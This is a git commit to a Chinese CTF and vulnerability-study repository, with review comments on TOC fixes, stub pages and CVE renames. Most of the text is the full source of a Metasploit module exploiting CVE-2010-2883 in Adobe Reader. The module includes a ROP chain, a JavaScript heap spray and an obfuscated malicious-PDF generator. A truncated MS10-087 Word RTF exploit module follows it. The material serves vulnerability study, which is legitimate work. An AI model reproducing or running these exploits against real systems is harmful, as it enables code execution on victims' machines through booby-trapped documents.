This commit is contained in:
firmianay 2018-05-22 15:21:13 +08:00
parent 382cad2cdb
commit 9c5d6239c3
24 changed files with 852 additions and 29 deletions


@ -59,6 +59,7 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* [2.4.4 binwalk](doc/2.4.4_binwalk.md)
* [2.4.5 Burp Suite](doc/2.4.5_burpsuite.md)
* [2.4.6 Wireshark](doc/2.4.6_wireshark.md)
* [2.4.7 Cuckoo Sandbox](doc/2.4.7_cuckoo.md)
* [三、分类专题篇](doc/3_topics.md)
* Pwn
* [3.1.1 格式化字符串漏洞](doc/3.1.1_format_string.md)
@ -156,10 +157,11 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* Reverse
* [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md)
* [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md)
* [6.2.3 re Codegate2017 angrybird](doc/6.2.3_re_codegate2017_angrybird.md)
* [6.2.3 re CodegateCTF2017 angrybird](doc/6.2.3_re_codegatectf2017_angrybird.md)
* [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md)
* [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md)
* [6.2.6 re SECCON2017 printf_machine](doc/6.2.6_re_seccon2017_printf_machine.md)
* [6.2.6 re SECCONCTF2017 printf_machine](doc/6.2.6_re_secconctf2017_printf_machine.md)
* [6.2.7 re CodegateCTF2018 RedVelvet](doc/6.2.7_re_codegatectf2018_redvelvet.md)
* Web
* [6.3.1 web HCTF2017 babycrack](doc/6.3.1_web_hctf2017_babycrack.md)
* Crypto
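Review bot: the 6.2.3 and 6.2.6 renames (codegate2017 to codegatectf2017, seccon2017 to secconctf2017) bring those two entries in line with the CTF-name-plus-year pattern the other writeup files already use, but they also invalidate any existing bookmarks or external links to doc/6.2.3_re_codegate2017_angrybird.md and doc/6.2.6_re_seccon2017_printf_machine.md; the commit message should say these are renames, since it currently only shows up as a TOC edit.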
@ -175,7 +177,7 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](doc/7.1.6_dnstracer_2017-9430.md)
* [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](doc/7.1.7_binutils_2018-6323.md)
* [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](doc/7.1.8_adobe_reader_2010-2883.md)
* [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-2333.md)
* [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-3333.md)
* Malware
* [八、学术篇](doc/8_academic.md)
* [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md)
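Review bot: the identifier fix is correct, the Word RTF pFragments bug is CVE-2010-3333 (MS10-087), not CVE-2010-2333, but the new doc/7.1.9_ms_word_2010-3333.md added in this same commit still cites https://www.cvedetails.com/cve/CVE-2010-2333 in its 参考资料 section and still writes the title as lowercase "cve-2010-3333"; both should be fixed so the TOC entry and the page agree.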


@ -1,10 +1,21 @@
# 2.3.2 OllyDbg 调试器
- [快捷键](#快捷键)
- [命令行插件](#命令行插件)
- [参考资料](#参考资料)
## 快捷键
- F2在光标选定位置按 F2 键设置或取消断点。
- F4运行到光标选定位置处暂停。
- F7单步步入每次执行一条指令遇到 call 等子程序时进入其中。
- F8单步步过每次执行一条指令遇到 call 等子程序时不进入其中。
- F9运行被调试软件继续运行直到遇到下一个断点。
- Ctrl+F9执行到返回在执行到一个 ret 指令时暂停,常用于从当前函数快速返回到上一个函数。
- Alt+F9执行到用户代码可用于从系统部分快速返回到被调试程序部分。
## 命令行插件
## 参考资料
- http://www.ollydbg.de/
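Review bot: the new 命令行插件 heading is added to the TOC but has no body; either describe the plugin (the cmdline.dll that ships with OllyDbg 1.10 and its bp/bpx/hr/hw style commands) or leave the heading out until it is written, because an empty section linked from the TOC reads as a broken page. One caveat worth adding to the F2 line: F2 sets a software (INT3) breakpoint, which patches the code byte in memory and is therefore visible to self-checksumming targets, while hardware breakpoints, set from the context menu, are not.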

doc/2.4.7_cuckoo.md Normal file

@ -0,0 +1,13 @@
# 2.4.7 Cuckoo Sandbox
- [简介](#简介)
- [安装](#安装)
- [参考资料](#参考资料)
## 简介
## 安装
## 参考资料
- https://cuckoosandbox.org/
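Review bot: 简介 and 安装 are empty placeholders while the page is already linked from both README.md and doc/2_tools.md in this commit; add at least a one-line description (Cuckoo is an open-source automated malware analysis sandbox that detonates samples in isolated guest VMs and reports their behaviour) and an outline of the host/guest install, or mark the heading as WIP so readers do not land on an empty page.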


@ -24,3 +24,4 @@
* [2.4.4 binwalk](2.4.4_binwalk.md)
* [2.4.5 Burp Suite](2.4.5_burpsuite.md)
* [2.4.6 Wireshark](2.4.6_wireshark.md)
* [2.4.7 Cuckoo Sandbox](2.4.7_cuckoo.md)


@ -23,7 +23,6 @@
```
$ git clone https://github.com/Z3Prover/z3.git
$ cd z3
$ python scripts/mk_make.py --python
$ cd build
$ make
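Review bot: the visible build steps now stop at `make`; with `--python` the bindings are generated under the build directory and are not importable until `sudo make install` is run (or PYTHONPATH points at the build output). If the line this hunk removes was that install step, restore it; if not, add it, otherwise readers following the z3 page will get an ImportError in the symbolic-execution sections.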


@ -2,5 +2,7 @@
- [参考资料](#参考资料)
## 参考资料
- [Quick introduction into SAT/SMT solvers and symbolic execution](https://yurichev.com/writings/SAT_SMT_draft-EN.pdf)
- [Practical Symbolic Execution and SATisfiability Module Theories (SMT) 101](http://deniable.org/reversing/symbolic-execution)


@ -1,10 +1,10 @@
# 6.2.3 re Codegate2017 angrybird
# 6.2.3 re CodegateCTF2017 angrybird
- [题目解析](#题目解析)
- [参考资料](#参考资料)
[下载文件](../src/writeup/6.2.3_re_codegate2017_angrybird)
[下载文件](../src/writeup/6.2.3_re_codegatectf2017_angrybird)
## 题目解析
看题目就知道,这是一个会让我们抓狂的程序,事实也确实如此。
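Review bot: the download link now targets ../src/writeup/6.2.3_re_codegatectf2017_angrybird; confirm that the directory under src/writeup is renamed in this commit as well (the src/ side of the diff is not shown on this page), otherwise the link breaks. The same check applies to the 6.2.6 printf_machine page, whose download link changes to ../src/writeup/6.2.6_re_secconctf2017_printf_machine in this commit.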
@ -266,3 +266,4 @@ you typed : Im_so_cute&pretty_:)
## 参考资料
- https://ctftime.org/task/3375


@ -1,10 +1,10 @@
# 6.2.6 re SECCON2017 printf_machine
# 6.2.6 re SECCONCTF2017 printf_machine
- [题目解析](#题目解析)
- [参考资料](#参考资料)
[下载文件](../src/writeup/6.2.6_re_seccon2017_printf_machine)
[下载文件](../src/writeup/6.2.6_re_secconctf2017_printf_machine)
## 题目解析
```
@ -14,4 +14,5 @@ fsmachine: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically l
## 参考资料
- https://ctftime.org/task/5042
- [400_printf_machine](https://github.com/SECCON/SECCON2017_online_CTF/tree/master/binary/400_printf_machine)


@ -0,0 +1,17 @@
# 6.2.7 re CodegateCTF2018 RedVelvet
- [题目解析](#题目解析)
- [参考资料](#参考资料)
[下载文件](../src/writeup/6.2.7_re_codegatectf2018_redvelvet)
## 题目解析
```
$ file RedVelvet
RedVelvet: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=84e7ef91c33878cf9eefc00a7a450895aa573494, not stripped
```
## 参考资料
- https://ctftime.org/task/5231
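Review bot: 题目解析 consists of nothing but the `file` output, yet the page is linked from both TOCs in this commit; either add the analysis or flag the page as WIP. One detail from that output is worth stating when the writeup is filled in: the binary is `not stripped`, so function symbols survive and the reader can start from `main` rather than from the entry point.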


@ -4,6 +4,8 @@
- [解题流程](#解题流程)
[下载文件](../src/writeup/6.3.1_web_hctf2017_babycrack)
## 题目解析
题目就不用多说了,很容易发现是 JavaScript 代码审计。


@ -32,10 +32,11 @@
* Reverse
* [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md)
* [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md)
* [6.2.3 re Codegate2017 angrybird](6.2.3_re_codegate2017_angrybird.md)
* [6.2.3 re CodegateCTF2017 angrybird](6.2.3_re_codegatectf2017_angrybird.md)
* [6.2.4 re CSAWCTF2015 wyvern](6.2.4_re_csawctf2015_wyvern.md)
* [6.2.5 re PicoCTF2014 Baleful](6.2.5_re_picoctf2014_baleful.md)
* [6.2.6 re SECCON2017 printf_machine](6.2.6_re_seccon2017_printf_machine.md)
* [6.2.6 re SECCONCTF2017 printf_machine](6.2.6_re_secconctf2017_printf_machine.md)
* [6.2.7 re CodegateCTF2018 RedVelvet](6.2.7_re_codegatectf2018_redvelvet.md)
* Web
* [6.3.1 web HCTF2017 babycrack](6.3.1_web_hctf2017_babycrack.md)
* Crypto


@ -17,6 +17,7 @@ Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的
| --- | --- | --- |
| 操作系统 | Windows XP SP3 | 体系结构32 位 |
| 调试器 | OllyDbg | 版本号:吾爱专版 |
| 反汇编器 | IDA Pro | 版本号6.8 |
| 漏洞软件 | Adobe Reader | 版本号9.3.4 |
我们利用 Metasploit 来生成攻击样本:


@ -1,18 +0,0 @@
# 7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞
- [漏洞描述](#漏洞描述)
- [漏洞复现](#漏洞复现)
- [漏洞分析](#漏洞分析)
- [参考资料](#参考资料)
[下载文件](../src/exploit/7.1.9_ms_word_2010-2333)
## 漏洞描述
## 漏洞复现
## 漏洞分析
## 参考资料
- https://www.cvedetails.com/cve/CVE-2010-2333


@ -0,0 +1,29 @@
# 7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞
- [漏洞描述](#漏洞描述)
- [漏洞复现](#漏洞复现)
- [漏洞分析](#漏洞分析)
- [参考资料](#参考资料)
[下载文件](../src/exploit/7.1.9_ms_word_2010-3333)
## 漏洞描述
cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 "pFragments" 属性时存在栈溢出可能导致任意代码执行。受影响的版本有MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。
## 漏洞复现
| |推荐使用的环境 | 备注 |
| --- | --- | --- |
| 操作系统 | Windows XP SP3 | 体系结构32 位 |
| 调试器 | OllyDbg | 版本号:吾爱专版 |
| 反汇编器 | IDA Pro | 版本号7.0 |
| 漏洞软件 | MS Office | 版本号2003 SP3 |
我们利用 Metasploit 来生成攻击样本
## 漏洞分析
## 参考资料
- https://www.cvedetails.com/cve/CVE-2010-2333
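Review bot: the 参考资料 link still points at CVE-2010-2333, the very identifier this commit renames away from; it should be https://www.cvedetails.com/cve/CVE-2010-3333. The title also uses lowercase "cve-2010-3333" while every TOC entry writes "CVE-". In 漏洞描述, the overflow is in Word's RTF parser when it handles the pFragments shape property (the Open XML File Format Converter for Mac is one affected product, not where the bug lives), and "Office 2007 SP0" understates the affected set: the bundled MS10-087 module states that all Office 2010, 2007, 2003 and XP builds before the bulletin are vulnerable, SP2 included. 漏洞复现 ends at "我们利用 Metasploit 来生成攻击样本" without the msfconsole steps, and 漏洞分析 is empty.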


@ -9,5 +9,5 @@
* [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](7.1.6_dnstracer_2017-9430.md)
* [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](7.1.7_binutils_2018-6323.md)
* [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](7.1.8_adobe_reader_2010-2883.md)
* [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-2333.md)
* [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-3333.md)
* Malware


@ -0,0 +1,562 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table
handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are
assumed to be vulnerable as well.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # 0day found in the wild
'sn0wfl0w', # initial analysis, also @vicheck on twitter
'jduck' # Metasploit module
],
'References' =>
[
[ 'CVE', '2010-2883' ],
[ 'OSVDB', '67849'],
[ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],
[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd
# Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd
# Tested OK via Adobe Reader 9.3 on XP and 7 -todb
[ 'Automatic', { }],
],
'DisclosureDate' => 'Sep 07 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
])
end
def exploit
ttf_data = make_ttf()
js_data = make_js(payload.encoded)
# Create the pdf
pdf = make_pdf(ttf_data, js_data)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def make_ttf
ttf_data = ""
# load the static ttf file
# NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)
path = File.join( Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf" )
fd = File.open( path, "rb" )
ttf_data = fd.read(fd.stat.size)
fd.close
# Build the SING table
sing = ''
sing << [
0, 1, # tableVersionMajor, tableVersionMinor (0.1)
0xe01, # glyphletVersion
0x100, # embeddingInfo
0, # mainGID
0, # unitsPerEm
0, # vertAdvance
0x3a00 # vertOrigin
].pack('vvvvvvvv')
# uniqueName
# "The uniqueName string must be a string of at most 27 7-bit ASCII characters"
#sing << "A" * (0x254 - sing.length)
sing << rand_text(0x254 - sing.length)
# 0xffffffff gets written here @ 0x7001400 (in BIB.dll)
sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')
# This becomes our new EIP (puts esp to stack buffer)
ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret
sing[0x208, 4] = [ret].pack('V')
# This becomes the new eip after the first return
ret = 0x4a82a714
sing[0x18, 4] = [ret].pack('V')
# This becomes the new esp after the first return
esp = 0x0c0c0c0c
sing[0x1c, 4] = [esp].pack('V')
# Without the following, sub_801ba57 returns 0.
sing[0x24c, 4] = [0x6c].pack('V')
ttf_data[0xec, 4] = "SING"
ttf_data[0x11c, sing.length] = sing
ttf_data
end
def make_js(encoded_payload)
# The following executes a ret2lib using icucnv36.dll
# The effect is to bypass DEP and execute the shellcode in an indirect way
stack_data = [
0x41414141, # unused
0x4a8063a5, # pop ecx / ret
0x4a8a0000, # becomes ecx
0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as
0x4a801f90, # pop eax / ret
0x4a84903c, # becomes eax (import for CreateFileA)
# -- call CreateFileA
0x4a80b692, # jmp [eax]
0x4a801064, # ret
0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to "iso88591")
0x10000000, # second arg - dwDesiredAccess
0x00000000, # third arg - dwShareMode
0x00000000, # fourth arg - lpSecurityAttributes
0x00000002, # fifth arg - dwCreationDisposition
0x00000102, # sixth arg - dwFlagsAndAttributes
0x00000000, # seventh arg - hTemplateFile
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x00000008, # becomes ebx - offset to modify
#
# This points at a neat-o block of code that ... TBD
#
# and [esp+ebx*2],edi
# jne check_slash
# ret_one:
# mov al,1
# ret
# check_slash:
# cmp al,0x2f
# je ret_one
# cmp al,0x41
# jl check_lower
# cmp al,0x5a
# jle check_ptr
# check_lower:
# cmp al,0x61
# jl ret_zero
# cmp al,0x7a
# jg ret_zero
# cmp [ecx+1],0x3a
# je ret_one
# ret_zero:
# xor al,al
# ret
#
0x4a80a8a6, # execute fun block
0x4a801f90, # pop eax / ret
0x4a849038, # becomes eax (import for CreateFileMappingA)
# -- call CreateFileMappingA
0x4a80b692, # jmp [eax]
0x4a801064, # ret
0xffffffff, # arguments to CreateFileMappingA, hFile
0x00000000, # lpAttributes
0x00000040, # flProtect
0x00000000, # dwMaximumSizeHigh
0x00010000, # dwMaximumSizeLow
0x00000000, # lpName
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x00000008, # becomes ebx - offset to modify
0x4a80a8a6, # execute fun block
0x4a801f90, # pop eax / ret
0x4a849030, # becomes eax (import for MapViewOfFile
# -- call MapViewOfFile
0x4a80b692, # jmp [eax]
0x4a801064, # ret
0xffffffff, # args to MapViewOfFile - hFileMappingObject
0x00000022, # dwDesiredAccess
0x00000000, # dwFileOffsetHigh
0x00000000, # dwFileOffsetLow
0x00010000, # dwNumberOfBytesToMap
0x4a8063a5, # pop ecx / ret
0x4a8a0004, # becomes ecx - writable pointer
0x4a802196, # mov [ecx],eax / ret - save map base addr
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx - ptr to ret
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x00000030, # becomes ebx - offset to modify
0x4a80a8a6, # execute fun block
0x4a801f90, # pop eax / ret
0x4a8a0004, # becomes eax - saved file mapping ptr
0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx - ptr to ret
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x00000020, # becomes ebx - offset to modify
0x4a80a8a6, # execute fun block
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx - ptr to ret
0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret
0x4a801f90, # pop eax / ret
0x00000034, # becomes eax
0x4a80d585, # add eax,edx / ret
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx - ptr to ret
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x0000000a, # becomes ebx - offset to modify
0x4a80a8a6, # execute fun block
0x4a801f90, # pop eax / ret
0x4a849170, # becomes eax (import for memcpy)
# -- call memcpy
0x4a80b692, # jmp [eax]
0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy
0xffffffff, # becomes first arg to memcpy (dst)
0xffffffff, # becomes second arg to memcpy (src)
0x00001000, # becomes third arg to memcpy (length)
#0x0000258b, # ??
#0x4d4d4a8a, # ??
].pack('V*')
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_start = rand_text_alpha(rand(100) + 1)
var_s = 0x10000
var_c = rand_text_alpha(rand(100) + 1)
var_b = rand_text_alpha(rand(100) + 1)
var_d = rand_text_alpha(rand(100) + 1)
var_3 = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
var_4 = rand_text_alpha(rand(100) + 1)
payload_buf = ''
payload_buf << stack_data
payload_buf << encoded_payload
escaped_payload = Rex::Text.to_unescape(payload_buf)
js = %Q|
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
#{var_b} += #{var_shellcode};
#{var_b} += #{var_c};
#{var_d} = #{var_b}.substring(0, #{var_s}/2);
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
var #{var_4} = new Array();
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
|
js
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj \n" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
#return str
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(ttf, js)
#swf_name = rand_text_alpha(8 + rand(8)) + ".swf"
xref = []
eol = "\n"
endobj = "endobj" << eol
# Randomize PDF version?
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
# catalog
xref << pdf.length
pdf << io_def(1) << n_obfu("<<") << eol
pdf << n_obfu("/Pages ") << io_ref(2) << eol
pdf << n_obfu("/Type /Catalog") << eol
pdf << n_obfu("/OpenAction ") << io_ref(11) << eol
# The AcroForm is required to get icucnv36.dll to load
pdf << n_obfu("/AcroForm ") << io_ref(13) << eol
pdf << n_obfu(">>") << eol
pdf << endobj
# pages array
xref << pdf.length
pdf << io_def(2) << n_obfu("<<") << eol
pdf << n_obfu("/MediaBox ") << io_ref(3) << eol
pdf << n_obfu("/Resources ") << io_ref(4) << eol
pdf << n_obfu("/Kids [") << io_ref(5) << "]" << eol
pdf << n_obfu("/Count 1") << eol
pdf << n_obfu("/Type /Pages") << eol
pdf << n_obfu(">>") << eol
pdf << endobj
# media box
xref << pdf.length
pdf << io_def(3)
pdf << "[0 0 595 842]" << eol
pdf << endobj
# resources
xref << pdf.length
pdf << io_def(4)
pdf << n_obfu("<<") << eol
pdf << n_obfu("/Font ") << io_ref(6) << eol
pdf << ">>" << eol
pdf << endobj
# page 1
xref << pdf.length
pdf << io_def(5) << n_obfu("<<") << eol
pdf << n_obfu("/Parent ") << io_ref(2) << eol
pdf << n_obfu("/MediaBox ") << io_ref(3) << eol
pdf << n_obfu("/Resources ") << io_ref(4) << eol
pdf << n_obfu("/Contents [") << io_ref(8) << n_obfu("]") << eol
pdf << n_obfu("/Type /Page") << eol
pdf << n_obfu(">>") << eol # end obj dict
pdf << endobj
# font
xref << pdf.length
pdf << io_def(6) << n_obfu("<<") << eol
pdf << n_obfu("/F1 ") << io_ref(7) << eol
pdf << ">>" << eol
pdf << endobj
# ttf object
xref << pdf.length
pdf << io_def(7) << n_obfu("<<") << eol
pdf << n_obfu("/Type /Font") << eol
pdf << n_obfu("/Subtype /TrueType") << eol
pdf << n_obfu("/Name /F1") << eol
pdf << n_obfu("/BaseFont /Cinema") << eol
pdf << n_obfu("/Widths []") << eol
pdf << n_obfu("/FontDescriptor ") << io_ref(9)
pdf << n_obfu("/Encoding /MacRomanEncoding")
pdf << n_obfu(">>") << eol
pdf << endobj
# page content
content = "Hello World!"
content = "" +
"0 g" + eol +
"BT" + eol +
"/F1 32 Tf" + eol +
"32 Tc" + eol +
"1 0 0 1 32 773.872 Tm" + eol +
"(" + content + ") Tj" + eol +
"ET"
xref << pdf.length
pdf << io_def(8) << "<<" << eol
pdf << n_obfu("/Length %s" % content.length) << eol
pdf << ">>" << eol
pdf << "stream" << eol
pdf << content << eol
pdf << "endstream" << eol
pdf << endobj
# font descriptor
xref << pdf.length
pdf << io_def(9) << n_obfu("<<")
pdf << n_obfu("/Type/FontDescriptor/FontName/Cinema")
pdf << n_obfu("/Flags %d" % (2**2 + 2**6 + 2**17))
pdf << n_obfu("/FontBBox [-177 -269 1123 866]")
pdf << n_obfu("/FontFile2 ") << io_ref(10)
pdf << n_obfu(">>") << eol
pdf << endobj
# ttf stream
xref << pdf.length
compressed = Zlib::Deflate.deflate(ttf)
pdf << io_def(10) << n_obfu("<</Length %s/Filter/FlateDecode/Length1 %s>>" % [compressed.length, ttf.length]) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
# js action
xref << pdf.length
pdf << io_def(11) << n_obfu("<<")
pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(12)
pdf << n_obfu(">>") << eol
pdf << endobj
# js stream
xref << pdf.length
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
pdf << io_def(12) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
###
# The following form related data is required to get icucnv36.dll to load
###
# form object
xref << pdf.length
pdf << io_def(13)
pdf << n_obfu("<</XFA ") << io_ref(14) << n_obfu(">>") << eol
pdf << endobj
# form stream
xfa = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
<present><pdf><interactive>1</interactive></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet></pageSet>
</subform></template></xdp:xdp>
EOF
xref << pdf.length
pdf << io_def(14) << n_obfu("<</Length %s>>" % xfa.length) << eol
pdf << "stream" << eol
pdf << xfa << eol
pdf << "endstream" << eol
pdf << endobj
###
# end form stuff for icucnv36.dll
###
# trailing stuff
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << eol
pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
pdf
end
end
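Review bot: this appears to be a verbatim copy of the upstream Metasploit module, and the header only says "Current source: metasploit-framework"; record the upstream path and the commit it was copied from in the 7.1.8 doc so the copy can be diffed against upstream later. Two things the doc should state so readers do not try to run the file from the repo directory: `make_ttf` loads the font from `File.join( Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf" )`, which is part of the Metasploit data tree and not of this repository, and the ROP chain addresses in `make_js` (0x4a8063a5, 0x4a80b692, 0x4a8a0004 and the rest) are hard-coded to icucnv36.dll as shipped with Reader 9.3.4, which is why the environment table pins exactly that version.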

Binary file not shown.


@ -0,0 +1,199 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087 bulletin are vulnerable.
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
The Microsoft Word RTF parser was only used by default in versions of Microsoft
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
began using the Word RTF parser, by default, to handle rich-text messages within
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
the Microsoft Word engine too, but it was not a default setting.
It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that
Microsoft will confirm or deny this since Office 2000 has reached its support
cycle end-of-life.
},
'License' => MSF_LICENSE,
'Author' =>
[
'wushi of team509', # original discovery
'unknown', # exploit found in the wild
'jduck', # Metasploit module
'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz
],
'References' =>
[
[ 'CVE', '2010-3333' ],
[ 'OSVDB', '69085' ],
[ 'MSB', 'MS10-087' ],
[ 'BID', '44652' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
'DisableNops' => true # no need
},
'Platform' => 'win',
'Targets' =>
[
# This automatic target will combine all targets into one file :)
[ 'Automatic', { } ],
# Office v10.6854.6845, winword.exe v10.0.6854.0
[ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English',
{
'Offsets' => [ 23532, 45944 ],
#'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0
'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0
}
],
# Office v11.8307.8324, winword.exe v11.0.8307.0
# Office v11.8328.8221, winword.exe v11.0.8328.0
[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',
{
'Offsets' => [ 24580, 51156 ],
'Ret' => 0x30001bdd # p/p/r in winword.exe
}
